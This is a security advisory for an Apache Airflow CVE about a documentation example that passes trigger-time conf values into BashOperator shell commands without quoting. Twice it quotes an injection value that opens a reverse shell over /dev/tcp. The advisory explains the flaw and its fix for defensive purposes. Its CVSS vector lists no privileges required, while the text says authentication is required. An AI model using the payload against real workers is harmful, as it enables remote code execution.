Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
An example in the documentation showed the construction `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` without any shell quoting or security warning. A user with `Dag.can_trigger` permission on the vulnerable DAG could pass a malicious value to the `conf` field via the DAG triggering API, such as `"; bash -i >& /dev/tcp/.../9999 0>&1; #"`. This value went directly to the shell command executed by the worker, enabling shell metacharacter injection and achieving `os.exec` invocation. The vulnerability required authentication, but typical multi-team environments and hosted services exposing the trigger API made it a realistic threat.
An authenticated attacker with permission to trigger a DAG can achieve remote code execution (RCE) on an Apache Airflow worker node, potentially taking control of worker processes and gaining access to processed data and the execution environment.
Apache Airflow should be updated to version 3.2.2 or newer, which provides corrected documentation with explicit shell quoting and security warnings. Additionally, existing DAG code should be reviewed and the pattern `{{ dag_run.conf['...'] }}` in BashOperator arguments should be replaced with a properly quoted shell version or use an environment variable mechanism for passing values instead of direct template interpolation in the command.
Apache Airflow deployments where DAG code was modeled on the example from the documentation prior to the fix (PR 64129) — particularly affecting multi-team environments and hosted services where users have `Dag.can_trigger` permission; according to the description, updating to apache-airflow version 3.2.2 or newer is recommended
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:NApache Airflow
APPApache3.0.0 – 3.2.2 (excl.)
Related vulnerabilities
Apache Airflow — brak uwierzytelnienia w Experimental API umożliwia RCE
Apache Airflow: RCE przez niebezpieczną deserializację DAG (CWE-502)
Apache Airflow: brak unieważnienia tokenu JWT po wylogowaniu
Apache Airflow Providers FAB — nieprawidłowe wygasanie sesji (CWE-613)
Apache Airflow – błąd przełączania kontekstu uprawnień przed wersją 2.6.0